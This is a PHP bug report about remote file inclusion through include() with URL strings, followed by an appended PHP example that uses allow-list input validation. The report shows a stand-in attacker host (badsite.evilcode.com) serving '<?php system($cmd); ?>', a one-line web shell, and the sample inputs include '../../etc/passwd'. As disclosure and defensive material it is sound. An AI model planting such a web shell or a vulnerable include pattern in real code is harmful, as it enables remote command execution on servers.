 ID:               21085
 Updated by:       [EMAIL PROTECTED]
 Reported By:      [EMAIL PROTECTED]
-Status:           Open
+Status:           Bogus
 Bug Type:         Unknown/Other Function
 Operating System: ALL
 PHP Version:      4.3.0RC3
 New Comment:

It's really up to the user to validate input from the outside. You can always shoot yourself in the foot if you want to. There is no valid reason to change this default.


Previous Comments:
------------------------------------------------------------------------

[2002-12-18 15:34:31] [EMAIL PROTECTED]

PHP by default allows include() calls which contain URL/URI strings.

register_globals=on

include("$somevar/file.php");  // real site code

exploit by overriding $somevar to http://badsite.evilcode.com where file.php is

<?php system($cmd); ?>

This causes the "real site" to execute the $cmd command passed in on the URL/URI string.

Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat.

-Mike

------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=21085&edit=1
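
The input validation the reply refers to, sketched as an added example that is not part of the bug report or of PHP itself: the request value is only ever used as a key into an allow-list, so a URL or a traversal path never reaches include(). The names MODULES and resolve_module, the file names and the sample request values are hypothetical and constructed for illustration.

```php
<?php
// Added example (not from the bug report). MODULES and resolve_module()
// are hypothetical names; file names and inputs are constructed.

// Allow-list: request value => file name under the include directory.
const MODULES = ['news' => 'news.php', 'forum' => 'forum.php'];

/** Map an untrusted request value to a local file path, or null if rejected. */
function resolve_module($requested, string $baseDir): ?string
{
    // Only exact allow-list keys are accepted, so a URL or a "../" path
    // supplied by the client is never concatenated into a file name.
    if (!is_string($requested) || !array_key_exists($requested, MODULES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . MODULES[$requested]);
    // realpath() returns false for missing files; the prefix check confirms
    // the resolved file really sits inside the include directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory standing in for the site's module dir.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'modules_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'news.php', "<?php echo \"news module\\n\";");

// Constructed request values: one legitimate, the rest hostile or malformed.
foreach (['news', 'http://host.example', '../../etc/passwd', ['x']] as $input) {
    $file = resolve_module($input, $dir);
    if ($file === null) {
        echo 'rejected: ' . json_encode($input, JSON_UNESCAPED_SLASHES) . "\n";
    } else {
        include $file;
    }
}

// Defence in depth: report the URL-wrapper setting discussed in the report.
printf("allow_url_fopen=%s\n", ini_get('allow_url_fopen'));

unlink($dir . DIRECTORY_SEPARATOR . 'news.php');
rmdir($dir);
```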